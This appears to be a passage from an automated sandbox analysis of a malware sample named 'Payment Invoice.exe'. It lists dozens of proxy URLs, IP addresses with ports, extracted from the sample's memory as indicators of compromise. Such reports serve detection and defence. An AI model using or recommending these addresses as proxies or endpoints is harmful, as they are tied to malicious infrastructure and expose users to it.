                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.196.1.182:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.24.80.166:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.35.240.119:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163198DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.35.240.119:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.18
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.67.10.183:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.73.224.54:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.73.224.54:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.79.107.158:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://52.79.107.158:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.152.3.36
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.152.3.36://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.152.3.36:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.178.159.199:18080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.178.159.199:18080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.212.22.168:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.212.22.168:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.233.119.172:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.233.119.172:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.110
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.110://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.248.238.110:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.1
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:17188
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:17188://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:29796
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:29796://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:44587
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.122.16:44587://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.81.217:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.36.81.217:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.196.189:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.196.189:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.91.252:63843
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.37.91.252:63843://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://54.38.181.125:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://57.128.163.242:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://57.128.163.242:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.20.248.139:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.20.248.139:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8197
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.234.116.197:8197://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319620000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.246.58.150:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319A1B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.246.58.150:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.69.201.117:8082
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.69.201.117:8082://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.75.126.235:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.75.126.235:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317225000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317185000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.84.32.118:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://58.84.32.118:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.126.92.130:33333
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.126.92.130:33333://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.15.28.76:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.15.28.76:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.153.158.19:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.153.158.19:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.92.70.176:3127
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.92.70.176:3127://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.98.4.70:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://59.98.4.70:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.12.168.114:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.12.168.114:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.188.102.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.188.102.225:18080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://60.188.102.225:18080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.129.2.212:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.129.2.212:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.133.66.69:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.133.66.69:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.178.152.31:7302
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.178.152.31:7302://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.216.156.222:60808
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.216.156.222:60808://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.230.151.39
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.230.151.39://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.230.151.39:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.138.243:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.138.243:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184D9000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163184EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.183.101:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163184E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.7.183.101:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.79.73.225
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.79.73.225://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.79.73.225:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.92.189.15
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.92.189.15://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://61.92.189.15:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316E86000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.122.201.246:50129
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.122.201.246:50129://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631959C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.141.70.118
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.141.70.118://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319CD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.141.70.118:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:25847
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:25847://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:29497
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:29497://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:41055
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:41055://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:44827
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.131.101:44827://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.133.66:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.133.66:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.184.96:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.171.184.96:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.182.114.164:59623
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.182.114.164:59623://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.198:4673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.212.198:4673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.220.50:60212
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.201.220.50:60212://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.207.202:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.53.248:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.33.53.248:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.72.57.240
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.72.57.240://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://62.99.138.162:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://63.76.255.180:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://63.76.255.180:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.124.145.1:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.124.145.1:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.225.4.63:9993
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.225.4.63:9993://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.182:14287
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.182:14287://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.25:31908
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.108.25:31908://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.227.134.208:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B63000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.44.139.12:20037
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.44.139.12:20037://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.90.51.168:55552
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.90.51.168:55552://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.40.47:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.40.47:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.152.88:8888
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.152.88:8888://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.211.101:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.211.101:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.231.142:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.231.142:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.24.81://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:58195
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.210.33.34:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.210.33.34:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.211.155.34:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.211.155.34:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.225.246.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.225.246.238:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.225.246.238:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.140.209:8899
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.140.209:8899://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:17464
